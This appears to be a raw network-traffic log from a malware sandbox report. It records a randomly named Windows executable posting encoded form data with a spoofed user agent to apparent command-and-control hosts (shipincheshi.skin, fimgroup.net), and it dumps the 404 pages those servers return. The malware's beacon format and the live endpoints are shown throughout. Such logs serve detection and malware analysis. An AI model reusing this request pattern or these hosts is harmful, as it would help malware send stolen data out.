Date: Mon, 16 Sep 2024 07:52:11 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 4860
Content-Type: text/html; charset=utf-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 49743 | 154.23.176.197 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe

Timestamp | Bytes transferred | Direction | Data
Sep 16, 2024 09:40:52.314702988 CEST | 1834 | OUT | POST /0vb3/ HTTP/1.1
Host: www.shipincheshi.skin
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US
Connection: close
Content-Length: 1245
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Origin: http://www.shipincheshi.skin
Referer: http://www.shipincheshi.skin/0vb3/
User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
Data Ascii: prutfR_P= [TRUNCATED]
Sep 16, 2024 09:40:53.450965881 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Date: Mon, 16 Sep 2024 07:52:13 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 5757
Content-Type: text/html; charset=utf-8
                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd 5c 7b 77 e3 c6 75 ff bb fe 14 53 65 63 49 b6 48 80 6f 52 d2 2a a5 28 8a a4 c4 97 f8 10 45 d9 ae 0e 08 0c 09 88 20 06 02 06 7c c8 de 73 92 36 b1 9d d6 eb b5 93 d4 b1 db a4 8e 9d 73 62 9f a4 59 a7 49 1b 3b 76 d6 fd 32 4b ed ee 5f fd 0a 9d 01 1f 02 49 90 92 b9 36 95 14 3a 92 88 c1 9d 3b bf 7b e7 de 3b f7 0e 01 6c fe ed 4e 26 52 28 67 a3 40 c4 0d 79 eb 99 cd c1 3f c8 09 5b cf 00 72 6c 36 20 e6 00 2f 72 9a 0e f1 ed a5 62 61 d7 11 5c ea 5f c2 12 96 e1 d6 a3 3f 7c f1 e8 8b f7 bb f7 de 7e f4 93 f7 9f fc e4 bd c7 9f 7c b2 c9 f4 ae 58 18 28 5c 03 de 5e d2 50 05 61 7d 09 f0 48 c1 50 21 ec 14 24 29 02 6c af 29 a8 8a 64 19 b5 96 00 d3 ef a5 e3 ce 80 03 3d 98 e7 c0 36 a7 43 f0 1c 33 6c aa 20 a1 03 5e 1e 9e d2 83 47 32 d2 d6 c1 b7 3c 1e cf c6 c8 85 2a 19 70 1d b8 fc 6a 1b 1c 42 4d e0 14 6e 0d 2c c5 a1 dc 84 58 e2 39 90 86 06 5c 5a 03 e2 a0 61 0d 84 35 89 93 d7 c0 72 4a e2 35 a4 a3 2a 06 65 2e 0e a5 e5 35 a0 73 8a ee d0 a1 26 55 47 87 68 70 5a 4d 52 d6 01 3b da ac 72 82 20 29 35 d2 [TRUNCATED]
                                                  Data Ascii: \{wuSecIHoR*(E |s6sbYI;v2K_I6:;{;lN&R(g@y?[rl6 /rba\_?|~|X(\^Pa}HP!$)l)d=6C3l ^G2<*pjBMn,X9\Za5rJ5*e.5s&UGhpZMR;r )5,3$^eqT.uZ/T>v,)!zSu<1w|TW4jbM5a#Y ym YT1NGLea;#"t=@AO`O6l1lKN164D:| _+ /"%X~{FOU7VI@ZT=\NocT'bI5N8uV$wA)%8T9) RP14jkAu)[5G<TMd\>5Z:;P6`|KPv&QKM_;!*NwFNio1*<<)qkc&NP9l"'K5b"<<Gvl73z&iEP*x]fO @])uapS|%#zIWeS_p2!6u#SCgb)B: (%g.j\Kht=L6>531Yik
                                                   Sep 16, 2024 09:40:53.450989962 CEST | 224 | IN | Data Raw: 4f ea d7 12 e9 ec d4 83 35 b2 58 3e ad cf db c8 6d ae 6a 57 2f 27 23 43 fc 85 68 63 6a 34 70 4d 29 32 ec 38 4c d8 fe 50 ab 84 c9 68 c0 b6 65 24 48 cd 75 22 21 76 f0 a2 24 0b b6 6e d4 5b b4 af b7 b2 f6 69 67 2c ae 96 85 70 24 9d 39 e4 48 05 49 52
                                                  Data Ascii: O5X>mjW/'#Chcj4pM)28LPhe$Hu"!v$n[ig,p$9HIRU>q49^#Wd^8;Ax*H?GKoXfRsfM_'SyK.zL/N3=u^a@bakV0Y H2"
                                                   Sep 16, 2024 09:40:53.450994968 CEST | 1236 | IN | Data Raw: cc 80 44 3a 1b 0b 34 8d 8f cc b3 69 83 64 6a be 02 14 62 d5 9a bd e3 f7 9d ca 1d fc f6 57 32 ad 96 28 61 e8 30 cb a2 75 12 91 a9 73 7c 05 38 d7 4c b3 ac d1 23 82 d4 8e 19 6a 26 8b 21 7e 70 69 46 2d 34 11 c4 46 8a 9c 29 c5 a4 d9 75 fa fe 89 15 5e
                                                  Data Ascii: D:4idjbW2(a0us|8L#j&!~piF-4F)u^>N(ItT,,W"8W$!PUUCkz9$q5I1:?nF,8Pj3{aH[q{+;_?B^MN6FxP3
                                                   Sep 16, 2024 09:40:53.450999022 CEST | 224 | IN | Data Raw: a6 b9 fd b8 05 1b 2a ee 90 82 cb 3c 21 01 b2 4f 65 5f c9 30 53 06 b9 f6 e0 d9 4c be 3f ba fd 48 9b f8 b2 d2 9b 75 6c 62 6d 0a 44 2c 6c a9 9a 81 ab b9 93 2c 81 2b 4c a7 9a 3a 46 b0 54 a9 e5 4e eb 9d 9c 58 4d e2 78 be ce 94 cf e2 99 70 71 8f db 55
                                                  Data Ascii: *<!Oe_0SL?HulbmD,l,+L:FTNXMxpqUh<#Zn3{a.T+k|tB~9\HJ{W@3v*w^"Ne+0FA%h>+D_(mACz[]xQ&'U
                                                   Sep 16, 2024 09:40:53.451006889 CEST | 1236 | IN | Data Raw: d2 5a 49 4f 78 c1 d9 76 dd e3 c1 65 9d 6f fa 82 a8 9c 88 15 b7 f3 05 5c 74 17 2b 7a 3d 2b 55 91 74 d4 06 6c 25 19 ab 26 c5 4e a6 e6 3e ca c2 78 8b c5 39 3e 54 06 8a 90 db c9 bb b0 dc 00 fb 91 78 73 ef 3c 24 4b 7b 2a 7b 9a 43 cd 4e 2d e1 c7 6c 36
                                                  Data Ascii: ZIOxveo\t+z=+Utl%&N>x9>Txs<$K{*{CN-l6wuO0zE}5sI@xtm5+h0}L9Lo'mpoNYR2(plDo5kN(YZ9R:WSe=X2j`&)Y'
                                                   Sep 16, 2024 09:40:53.451009989 CEST | 224 | IN | Data Raw: 43 73 3f 79 9a 7f 39 09 b2 37 01 f8 29 54 ed f2 79 9d 44 d1 ae 00 51 78 28 70 13 e0 9f 62 11 24 0e e0 d4 45 49 95 a8 f9 93 0f 4e bd 2e 29 37 21 43 3e b3 5b 28 85 73 f3 ca 11 56 39 22 c0 8d 00 4f c4 d2 e1 42 71 6e e4 cf ca 78 83 13 04 0d ea 3a fd
                                                  Data Ascii: Cs?y97)TyDQx(pb$EIN.)7!C>[(sV9"OBqnx:/Ho~e?CYa*3c=m@r$IOgJO?\ O5FF<'3zER-;BOFI8F9eLsI9dJRR+$6k|1$pB6$Y
                                                   Sep 16, 2024 09:40:53.451047897 CEST | 1236 | IN | Data Raw: 60 92 b9 23 b7 3b b2 4a 7c 94 e4 9e 25 58 d9 97 30 e3 f3 04 9c 1e 3f 58 d9 8f 17 52 49 7a 1f 6e 1d 82 18 e4 eb 68 15 e4 b9 86 6e 28 b5 6d 0d b5 88 55 30 6e 52 87 46 44 8d ee 72 79 bc 74 b0 a0 37 e0 0c f8 09 a8 8a 24 13 47 e1 aa 9c 26 0d f8 2d 5c
                                                  Data Ascii: `#;J|%X0?XRIznhn(mU0nRFDryt7$G&-\$g:D\"6w1K&quIo[Kgxj "04*$F"{lPr{}E3L:y}xq#hh<I<T#kX9@E)
                                                   Sep 16, 2024 09:40:53.451119900 CEST | 370 | IN | Data Raw: 7d 88 1e a5 a1 9d 7a dc c7 e9 c6 23 ee b8 ea 48 4e f5 e8 c1 fd ee 6b 9f d3 b7 30 7f f0 c6 64 a6 a3 69 27 e6 83 56 bd 59 36 9f f4 a4 51 8f 66 50 83 39 21 bf a3 03 0f 3a 5d c6 05 d2 dd a6 91 44 4b 70 f9 86 d7 f1 10 67 71 d6 95 65 86 e1 05 c5 59 41
                                                  Data Ascii: }z#HNk0di'VY6QfP9!:]DKpgqeYANaLFs3gCR_]W+l/^G?O?];?~/{$]}[o@2C7}n='=|p}


                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                   32 | 192.168.2.5 | 49744 | 154.23.176.197 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                   Timestamp | Bytes transferred | Direction | Data
                                                   Sep 16, 2024 09:40:54.858746052 CEST | 529 | OUT | GET /0vb3/?prutfR_P=xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.shipincheshi.skin
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                   Sep 16, 2024 09:40:55.801822901 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Date: Mon, 16 Sep 2024 07:52:16 GMT
                                                  Server: Apache
                                                  Upgrade: h2
                                                  Connection: Upgrade, close
                                                  Vary: Accept-Encoding
                                                  Transfer-Encoding: chunked
                                                  Content-Type: text/html; charset=utf-8
                                                  Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e5 8f 91 e7 94 9f e9 94 99 e8 af af 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 36 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d [TRUNCATED]
                                                  Data Ascii: 2000<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title></title> <meta name="robots" content="noindex,nofollow" /> <style> /* Base */ body { color: #333; font: 16px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color [TRUNCATED]
                                                   Sep 16, 2024 09:40:55.801841021 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a
                                                  Data Ascii: cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{ background: #f8cbcb; } .echo table { width: 100%; } .echo pr
                                                   Sep 16, 2024 09:40:55.801850080 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 39 39 39 3b 0a
                                                  Data Ascii: padding: 16px; border-radius: 4px; background: #999; } .exception .source-code{ padding: 6px; border: 1px solid #ddd; background: #f9f9f9; overflow-x
                                                   Sep 16, 2024 09:40:55.801861048 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61
                                                  Data Ascii: line-height: 16px; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; } .exception .trace ol{ margin: 12px; } .exception .trace ol li{
                                                   Sep 16, 2024 09:40:55.801872015 CEST | 1236 | IN | Data Raw: 67 6e 3a 20 74 6f 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65
                                                  Data Ascii: gn: top; word-break: break-all; } .exception-var table td:first-child{ width: 28%; font-weight: bold; white-space: nowrap; } .exception-var table td pre{
                                                   Sep 16, 2024 09:40:55.801882029 CEST | 1236 | IN | Data Raw: 2f 2a 20 61 20 6d 61 72 6b 75 70 20 61 74 74 72 69 62 75 74 65 20 76 61 6c 75 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 64 65 63 2c 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 76 61 72 20
                                                  Data Ascii: /* a markup attribute value */ pre.prettyprint .dec, pre.prettyprint .var { color: #606 } /* a declaration; a variable name */ pre.prettyprint .fun { color: red } /* a function name */ </style></head><body> <div cla
                                                   Sep 16, 2024 09:40:55.801919937 CEST | 1236 | IN | Data Raw: a8 a1 e5 9d 97 0a 3c 2f 63 6f 64 65 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 6e 65 2d 35 39 22 3e 3c 63 6f 64 65 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 74 68 69 73 2d 26 67 74 3b 72 65 71 75 65 73 74 2d 26 67 74 3b
                                                  Data Ascii: </code></li><li class="line-59"><code> $this-&gt;request-&gt;setModule($module);</code></li><li class="line-60"><code> $this-&gt;app-&gt;init($module);</code></li><li class="line-61"><code> } el
                                                   Sep 16, 2024 09:40:55.801930904 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 69 6e 20 3c 61 20 63 6c 61 73 73 3d 22 74 6f 67 67 6c 65 22 20 74 69 74 6c 65 3d 22 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 6a 69 61 6e 63 68 65 2e 7a 68 6f 6e 67 7a 68 75 61 6e 6b 6b 31 34 34 2e 73
                                                  Data Ascii: <li>in <a class="toggle" title="/www/wwwroot/jianche.zhongzhuankk144.sbs/thinkphp/library/think/route/dispatch/Module.php line 62">Module.php line 62</a></li> <li> at <abbr title="thi
                                                   Sep 16, 2024 09:40:55.801940918 CEST | 1236 | IN | Data Raw: 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 3e 70 72 75 74 66 52 5f 50 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: tr> <td>prutfR_P</td> <td> xUzASW4UVirhqEepkKH7G1hhCXRgKJ LG3aq8idvTSxDBC AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX QQCm9qWw==
                                                   Sep 16, 2024 09:40:55.801949978 CEST | 556 | IN | Data Raw: 77 77 77 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                  Data Ascii: www </td> </tr> <tr> <td>HOME</td> <td> /home/www </td> </tr>
                                                   Sep 16, 2024 09:40:55.808562040 CEST | 1236 | IN | Data Raw: 78 55 7a 41 53 57 34 55 56 69 72 68 71 45 65 70 6b 4b 48 37 47 31 68 68 43 58 52 67 4b 4a 2b 4c 47 33 61 71 38 69 64 76 54 53 78 44 42 43 2b 41 67 6e 59 4c 4d 72 38 67 79 68 30 42 49 58 6e 6f 31 43 45 65 67 4a 76 63 67 73 39 48 67 46 6b 34 48 6c
                                                  Data Ascii: xUzASW4UVirhqEepkKH7G1hhCXRgKJ+LG3aq8idvTSxDBC+AgnYLMr8gyh0BIXno1CEegJvcgs9HgFk4HlC4XGXQkMAamkZroN1kMIfewJ5xcpTkuE3fYdnwX+QQCm9qWw==&amp;u8b=M0MH_xux6 </td> </tr> <tr>


                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                   33 | 192.168.2.5 | 49745 | 62.149.128.40 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                   Timestamp | Bytes transferred | Direction | Data
                                                   Sep 16, 2024 09:41:01.486906052 CEST | 782 | OUT | POST /f3w9/ HTTP/1.1
                                                  Host: www.fimgroup.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 209
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.fimgroup.net
                                                  Referer: http://www.fimgroup.net/f3w9/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4f 6a 51 6d 68 4c 44 74 77 72 42 61 2b 62 4b 4c 66 35 57 63 6b 46 64 44 4a 71 61 36 4f 2b 51 58 77 65 76 74 64 6f 72 77 66 2b 68 66 6c 78 76 5a 74 47 6a 44 6c 37 70 41 79 46 49 72 68 63 47 6d 2f 53 6b 6f 43 4e 70 32 50 65 4f 35 62 53 50 42 49 37 4f 57 6a 36 52 32 58 77 62 6f 42 47 34 5a 2b 33 4d 56 4c 71 4e 63 4c 57 72 73 34 4f 66 42 75 57 2f 51 6e 4f 56 6d 74 46 30 47 50 71 61 45 39 31 45 4d 36 6c 62 44 39 2f 67 39 32 6a 45 4a 75 6b 53 68 53 4d 73 37 73 72 34 41 2b 52 57 78 4b 6c 2f 44 6e 44 54 78 6d 61 74 30 50 32 68 45 6b 64 73 6d 69 57 44 6c 53 61 7a 46 39 2b 54 5a 50 47 54 7a 32 2b 49 3d
                                                  Data Ascii: prutfR_P=OjQmhLDtwrBa+bKLf5WckFdDJqa6O+QXwevtdorwf+hflxvZtGjDl7pAyFIrhcGm/SkoCNp2PeO5bSPBI7OWj6R2XwboBG4Z+3MVLqNcLWrs4OfBuW/QnOVmtF0GPqaE91EM6lbD9/g92jEJukShSMs7sr4A+RWxKl/DnDTxmat0P2hEkdsmiWDlSazF9+TZPGTz2+I=
                                                   Sep 16, 2024 09:41:02.161469936 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                  Cache-Control: private
                                                  Content-Type: text/html; charset=utf-8
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 16 Sep 2024 07:41:01 GMT
                                                  Connection: close
                                                  Content-Length: 4948
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                   Sep 16, 2024 09:41:02.161495924 CEST | 1236 | IN | Data Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                   Sep 16, 2024 09:41:02.161513090 CEST | 1236 | IN | Data Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                   Sep 16, 2024 09:41:02.161528111 CEST | 672 | IN | Data Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                  Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                   Sep 16, 2024 09:41:02.161544085 CEST | 787 | IN | Data Raw: 70 3b 26 6e 62 73 70 3b 44 3a 5c 69 6e 65 74 70 75 62 5c 77 77 77 72 6f 6f 74 5c 66 33 77 39 5c 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 4c 6f 67 6f 6e 20 4d 65 74 68 6f 64 3c 2f
                                                  Data Ascii: p;&nbsp;D:\inetpub\wwwroot\f3w9\</td></tr> <tr class="alt"><th>Logon Method</th><td>&nbsp;&nbsp;&nbsp;Anonymous</td></tr> <tr><th>Logon User</th><td>&nbsp;&nbsp;&nbsp;Anonymous</td></tr> <tr class="alt"><th>Request Tracing Direc


                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                   34 | 192.168.2.5 | 49746 | 62.149.128.40 | 80 | 2796 | C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                   Timestamp | Bytes transferred | Direction | Data
                                                   Sep 16, 2024 09:41:04.036267042 CEST | 802 | OUT | POST /f3w9/ HTTP/1.1
                                                  Host: www.fimgroup.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  Content-Length: 229
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: no-cache
                                                  Origin: http://www.fimgroup.net
                                                  Referer: http://www.fimgroup.net/f3w9/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Data Raw: 70 72 75 74 66 52 5f 50 3d 4f 6a 51 6d 68 4c 44 74 77 72 42 61 2b 34 69 4c 5a 76 65 63 76 46 64 45 51 71 61 36 41 65 51 70 77 65 6a 74 64 70 2b 37 66 49 35 66 67 6a 33 5a 73 45 4c 44 6b 37 70 41 36 6c 49 55 2f 73 47 39 2f 53 5a 56 43 49 52 32 50 59 69 35 62 58 7a 42 49 49 6d 52 67 4b 52 30 43 67 62 71 63 32 34 5a 2b 33 4d 56 4c 72 70 6d 4c 57 44 73 34 2f 76 42 76 30 48 54 38 75 56 6c 71 46 30 47 4c 71 61 66 39 31 46 72 36 67 37 74 39 36 6b 39 32 69 30 4a 70 31 53 67 59 4d 73 68 6a 4c 35 49 39 54 66 48 53 46 58 4d 72 56 65 44 78 4b 70 64 4b 41 4d 75 2b 2f 6b 4f 78 32 76 64 43 4a 37 79 73 4f 79 77 56 6c 44 44 6f 70 64 4a 54 71 6f 2b 6c 66 44 44 44 50 36 4e 47 4b 33 32 6f 46 67 54
